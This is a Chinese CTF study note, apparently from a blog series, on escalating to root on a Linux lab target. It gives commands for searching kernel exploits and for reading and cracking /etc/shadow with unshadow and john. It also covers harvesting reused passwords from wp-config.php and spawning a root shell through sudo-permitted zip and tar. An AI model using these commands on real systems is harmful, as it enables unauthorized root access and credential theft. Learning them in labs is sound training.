我的CTF学习与教学之旅笔记11

目录遍历(提权root权限)web安全提权

我的CTF学习与教学之旅笔记11_第1张图片

内核漏洞提权:

查看发行版本:/etc/issue、/etc/*-release、uname -a

如:searchsploit Ubuntu 12.04.5        查找载荷

如果有合适的载荷,则可以进行内核溢出,否则不行

我的CTF学习与教学之旅笔记11_第2张图片


提权方法一:破解linux用户密码步骤:

获取到/etc/passwd、/etc/shadow到本地。通常meterpreter的download命令可以下载这两个文件

unshadow passwd shadow > cracked    

john craked

至此,完成用户密码破解

提权方法二:(我并不常用,掌握的不好)利用用户的定时任务

提权方法三:密码复用,找到一些配置文件,查看是否有密码

www-data这个低权限用户,通过弱口令,没有猜测成功。

低权限用户执行sudo -l   进行提权,需要密码,这时我们需要考虑浏览机器上有哪些web应用

在/home目录下有个zico用户目录

发现这个目录下有wordpress目录

如找到wordpress应用,尝试找到这个应用的配置文件wp-config.php,里面有可能用户名和密码  #密码复用:数据库与系统一个密码

我的CTF学习与教学之旅笔记11_第3张图片

可以用这个用户和密码,利用ssh远程登录靶机

ssh [email protected]

使用sudo -l 查看当前用户可以使用root提权的命令信息 

发现zip tar命令是有root权限的,且不用密码

则利用如下步骤题提权:

方法一:zip

touch exploit

sudo -u root zip exploit.zip exploit -T --unzip-command="sh -c /bin/bash"执行后可以提升到root权限

方法二:tar

我的CTF学习与教学之旅笔记11_第4张图片

sudo -u root tar cf /dev/null exploit --checkpoint=1 --checkpoint-action="/bin/sh"

 

你可能感兴趣的:(web安全)